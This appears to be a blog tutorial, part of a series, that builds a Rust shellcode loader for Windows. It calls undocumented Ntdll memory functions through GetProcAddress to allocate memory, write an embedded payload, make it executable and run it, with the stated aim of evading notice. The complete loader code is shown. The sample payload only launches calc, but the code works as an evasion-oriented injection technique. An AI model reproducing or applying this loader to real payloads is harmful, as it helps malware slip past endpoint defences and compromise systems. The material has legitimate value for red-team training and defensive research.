Payload Injection on Windows Part III

Hello and welcome back! In our last post we explored how to write a safe(r) wrapper around the calls we needed from the Rust winapi crate. In this post, we will explore calling undocumented Ntdll functions in order to inject our payload a little more surreptitiously.

First let's start by revisiting the Windows API. I mentioned in part one that the Windows API is a set of interfaces that are exposed to users to develop programs that interact with the operating system. To get a little more technical, these interfaces are broken down and exposed via several header files and Dynamic-Link Libraries or DLLs. Breaking up the API into different header files and DLLs makes it easier to interact with only the parts of the API that you need. The Windows API is also structured in a way to abstract some of the inner workings away from the user. For instance, let's take a look at VirtualAlloc. According to the Windows documentation, VirtualAlloc is defined in the memoryapi.h header file (included in windows.h), and exposed through Kernel32.dll. Now lets take a look at the function in a debugger.

virtual_alloc_dbg.png

Interesting. If you look at the function, you'll see a call to ZwAllocateVirtualMemory just a few lines in. But what is ZwAllocateVirtualMemory?

Well, ZwAllocateVirtualMemory is an API call that resides in Ntdll.dll. Windows has some documentation on ZwAllocateVirtualMemory here. From reading the documentation, it looks ZwAllocateVirtualMemory is a function that can be used from user space or kernel space to allocate memory in a process.

So, when you call VirtualAlloc, VirtualAlloc packages up the appropriate arguments and then calls ZwAllocateVirtualMemory from Ntdll. However, it is possible to skip the call to VirtualAlloc and call the Ntdll functions directly, if you know the proper syntax.

The documentation also mentions that if you are calling this function from userland you should actually call NtAllocateVirtualMemory instead. Taking a look at the exports in Ntdll it actually looks like NtAllocateVirtualMemory and ZwAllocateVirtualMemory point to the same location. However, we'll listen to the documentation and call the function using NtAllocateVirtualMemory.

ntdll_exports.png

While ZwAllocateVirtualMemory has some documentation, not all Ntdll function are (officially) documented. So why are there undocumented Dll functions? Well, because Microsoft doesnt really want you to use them. The idea is that you call VirtualAlloc from Kernel32.dll, which is documented, and then it gets everything ready and calls NtAllocateVirtualMemory from Ntdll.dll. That way, Microsoft can expose a well-documented API for allocating memory and, in case they need to change something, they can change the upstream functions in Ntdll and still keep original API interface unchanged.

There is a project by Tomasz Nowak called called ninternals here that documents all of the undocumented Ntdll functions. We will use this documentation as a guide for the other Nt functions that we will need.

So, how do you go about calling functions if you cant compile against them?

Well, Windows allows you to dynamically load and unload libraries during program execution and call functions within those libraries. Windows provides the LoadLibrary and GetProcAddress functions for that purpose. Luckily for us, Ntdll is loaded into every Windows process, so we can use GetModuleHandle to get a handle to the library.

The process will look like the following: Get a handle to Ntdll using GetModuleHandle and then use GetProcAddress to obtain the address of the function that we want to call. Then, type-cast the address of the function to a function pointer with the same calling convention and arguments. Finally, just call the address as a regular function.

Alright, with all of that out of the way, its back to coding!

Let's create a new rust project. I named mine winapi-ntdll, but I forgot to save the code of me creating the project so you're just going to have to believe me on this one.

Next we'll add the features that we need from winapi-rs to the Cargo.toml.

# Contents of Cargo.toml

[package]
name = "winapi-ntdll"
version = "0.1.0"
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
winapi = { version = "0.3", features = ["libloaderapi", "processthreadsapi"] }

Over in main.rs we'll need to use CString, which we'll get to in a minute, and we'll need a couple of functions from the libloaderapi.

GetModuleHandleA and GetProcAddress both take C strings as an argument, so we'll start off by creating C strings for ntdll and NtAllocateVirtualMemory. Next, we'll pass those C strings to GetModuleHandleA to get a handle to the Ntdll library thats loaded in our process. Then, we'll use our new handle to ntdll to get the address of the NtAllocateVirtualMemory function. After getting the address of NtAllocateVirtualMemory, we're going to drop the C strings that we generated, since we'll no longer need them.

// contents of main.rs
use std::ffi::CString;
use winapi::{
    um::{
        libloaderapi::{GetModuleHandleA, GetProcAddress},
    },
};

fn main() {
    // generate C string pointers for calls to GetModuleHandle and GetProcAddress
    let ntdll_name = CString::new("ntdll.dll").unwrap().into_raw();
    let proc_name = CString::new("NtAllocateVirtualMemory").unwrap().into_raw();

    let ntdll_handle = unsafe { GetModuleHandleA(ntdll_name) };
    let func = unsafe { GetProcAddress(ntdll_handle, proc_name) };
    // have rust retake the CString pointers to free the memory
    // see https://doc.rust-lang.org/std/ffi/struct.CString.html#method.into_raw
    unsafe {
        let _ = CString::from_raw(ntdll_name);
        let _ = CString::from_raw(proc_name);
    }
    println!("NTDLL handle: {:?}", ntdll_handle);
    println!("NtAllocateVirtualMemory address: {:?}", func);
}

Add a couple of lines to print out our newly acquired adresses and give it a go.

D:\projects\rust\blog\win-api\winapi-ntdll>cargo run
   Compiling winapi-ntdll v0.1.0 (D:\projects\rust\blog\win-api\winapi-ntdll)
    Finished dev [unoptimized + debuginfo] target(s) in 0.74s
     Running `target\debug\winapi-ntdll.exe`
NTDLL handle: 0x7ffcc9990000
NtAllocateVirtualMemory address: 0x7ffcc9a2d060

D:\projects\rust\blog\win-api\winapi-ntdll>

Now we have an address to a function that has been loaded in memory. Before we can call this address as a function, we need to tell Rust how to call the function. That is, what kind of function it is, what kind of arguments it takes, and what kind of value it returns.

We can use the Windows documentation to get the return values and arguments that we need. Below I have copy and pasted the the syntax from the Windows documentation and added comments for the Rust equivalence.

__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory( // We can use Extern "C" here and return u32 for NTSTATUS
	[in] HANDLE ProcessHandle, // winapi PVOID
	[in, out] PVOID *BaseAddress, // winapi *mut PVOID
	[in] ULONG_PTR ZeroBits, // u32
	[in, out] PSIZE_T RegionSize, // *mut usize
	[in] ULONG AllocationType,  // u32
	[in] ULONG Protect // u32
);

Now that we have the proper arguments, return values, and calling convention, we can use Rust's transmute function to transmute the pointer.

let ntallocvmem = unsafe {
 	std::mem::transmute::<
 		*mut __some_function, // addresses returned from Winapi-rs GetProcAddress are of type *mut __some_function
 		unsafe extern "C" fn(PVOID, *mut PVOID, u32, *mut usize, u32, u32) -> u32,
 	>(func)
 };

Now we can set up the variables for our arguments and call the function.

The base address variable is going to take a bit of casting to get the proper type. We start with std::ptr::null_mut::<usize> and cast that as *mut usize, which we then cast again as *mut c_void. When we call the function we'll pass that by reference and cast the reference again to get our *mut *mut c_void. It's not particularly pretty, but it will work.

The rest of the arguments are pretty straightforward.

let handle = unsafe { GetCurrentProcess() }; // Get a handle to our process 
let mut base_address = std::ptr::null_mut::<usize>() as *mut usize as *mut c_void;
println!("Base_address address: {:?}", base_address);
let zerobits = 0;
let mut regionsize: usize = 1024;
println!("Calling function");
let out = unsafe {
	ntallocvmem(
		handle,
		&mut base_address as *mut *mut c_void, // the function is expexting PVOID * which translates to *mut *mut c_void
		zerobits,
		&mut regionsize,
		MEM_COMMIT | MEM_RESERVE,
		PAGE_READWRITE,
	)
};
if out == 0x00000000 {
	println!(
		"Successfully called NtAllocateVirtualMemory: BaseAddress: {:?}, RegionSize: {}",
		base_address, regionsize
	);
} else {
	println!("Error calling NtAllocateVirtualMemeory: {:x}", out);
}

Time to compile and test it out!

calling_ntallocate.png

Success! Looks like we we're able to call the function in NTDLL successfully. If you're wondering why the region size says 4096, but we only allocated 1024 bytes. Windows will round up the requested region size to the next page size, since a page is 4096 bytes, it rounded up to 4096.

Now we have to do the same for the other functions that we need; NtWriteVirtualMemory and NtProtectVirtualMemory.

Since the remaining functions arent documented by Microsoft, we'll rely on the definitions in ntinternals.

First is NtWriteVirtualMemory. I've put the function definition from the ninternals website below and added comments for the Rust types.

NTSYSAPI 
NTSTATUS // Again, we'll use Extern "C"
NTAPI

NtWriteVirtualMemory(
  IN HANDLE               ProcessHandle, // winapi-rs HANDLE 
  IN PVOID                BaseAddress, // winapi-rs PVOID
  IN PVOID                Buffer, // winapi-rs PVOID
  IN ULONG                NumberOfBytesToWrite, // u32
  OUT PULONG              NumberOfBytesWritten OPTIONAL // &mut u32
);

and then NtProtectVirtualMemory.

NTSYSAPI 
NTSTATUS // Extern "C"
NTAPI

NtProtectVirtualMemory(
  IN HANDLE               ProcessHandle, // winapi-rs HANDLE
  IN OUT PVOID            *BaseAddress, // winapi-rs *mut PVOID  or *mut *mut c_void
  IN OUT PULONG           NumberOfBytesToProtect, // &mut u32
  IN ULONG                NewAccessProtection, // u32
  OUT PULONG              OldAccessProtection  // &mut u32
);

The rest of the process is exactly the same as with NtAllocateVirtualMemory. We get the address of the function using GetProcAddress, transmute the function to the appropriate syntax, and then call the function.

You'll notice some changes to the code below. I've broken out the code responsible for handling getting the address of the module and getting addresses of functions within that module. I won't get into that code because there isn't really much to it and in the previous blog post I went into detail on how to write wrappers around the Windows API. I also included a macro to handle transmuting the function to remove a little bit of boilerplate code. I just made a very slight modification to the macro found here. Finally, I added the anyhow crate to make handling errors a little nicer.

// contents of main.rs
use anyhow::Result;
use std::convert::TryInto;
use winapi_ntdll::{
    win::Module,
    transmute,
};
use winapi::{
    ctypes::c_void,
    um::{
        processthreadsapi::GetCurrentProcess,
        winnt::{HANDLE, MEM_COMMIT, MEM_RESERVE, PAGE_READWRITE, PAGE_EXECUTE_READ, PVOID},
    },
};

fn main() -> Result<()> {
    let payload = include_bytes!("w64-exec-calc.bin");
    let ntdll = Module::get("ntdll.dll")?;
    let ntavm_addr = ntdll.get_proc_address("NtAllocateVirtualMemory")?;

    println!("NtAllocateVirtualMemory address: {:?}", ntavm_addr);

    let nt_allocate_virtual_memory = unsafe {
        transmute!(ntavm_addr, unsafe extern "C" fn(PVOID, *mut PVOID, u32, *mut usize, u32, u32) -> u32)
    };
 
    let handle = unsafe { GetCurrentProcess() };
    let mut base_address = std::ptr::null_mut::<usize>() as *mut usize as *mut c_void;
    println!("Base_address address: {:?}", base_address);
    let zerobits = 0;
    let mut regionsize: usize = payload.len();
    let mut out = unsafe {
        nt_allocate_virtual_memory(
            handle,
            &mut base_address as *mut *mut c_void,
            zerobits,
            &mut regionsize,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_READWRITE,
        )
    };
    if out == 0x00000000 {
        println!(
            "Successfully called NtAllocateVirtualMemory: BaseAddress: {:?}, RegionSize: {}",
            //base_address, regionsize
            base_address, regionsize
        );
    } else {
        println!("Error calling NtAllocateVirtualMemeory: {:x}", out);
    }
    
    let ntwvm_addr = ntdll.get_proc_address("NtWriteVirtualMemory")?;
    let nt_write_virtual_memory = unsafe {
        transmute!(ntwvm_addr, unsafe extern "C" fn(HANDLE, PVOID, PVOID, u32, &mut u32) -> u32)
    };

    let mut bytes_written: u32 = 0;
    out = unsafe { 
        nt_write_virtual_memory(
            handle,
            base_address,
            payload.as_ptr() as *mut c_void,
            payload.len() as u32,
            &mut bytes_written
        )
    };
    if out == 0x00000000 {
        println!("Successfully called NtWriteVirtualMemory: bytes written: {}", bytes_written );
    } else {
        println!("Error calling NtWriteVirtualMemory: {:x}", out);
    }

    let ntpvm_addr = ntdll.get_proc_address("NtProtectVirtualMemory")?;
    let nt_protect_virtual_memory = unsafe {
        transmute!(ntpvm_addr, unsafe extern "C" fn(HANDLE, *mut PVOID, &mut u32, u32, &mut u32) -> u32)
    };

    let mut payload_len: u32 = payload.len().try_into()?;
    let mut old_protect: u32 = 0;

    out = unsafe {
        nt_protect_virtual_memory(
            handle,
            &mut base_address as *mut *mut c_void,
            &mut payload_len,
            PAGE_EXECUTE_READ,
            &mut old_protect,
        )
    };
    if out == 0x00000000 {
        println!("Successfully called NtProtectVirtualMemory");
    } else {
        println!("Error calling NtProtectVirtualMemory: {:x}", out);
    }
}

Now to test it out.

final.png

All we have to do now is cast base_address as a function and then call it!

    let func = unsafe { std::mem::transmute::<*mut c_void, fn()>(base_address)};
	println!("Calling shellcode!");
    func();
    Ok(())

winmem-ntdll.gif

Thanks for reading! Check in next time when we embed the syscalls from ntdll.dll directly into our binary using the syswhispers project.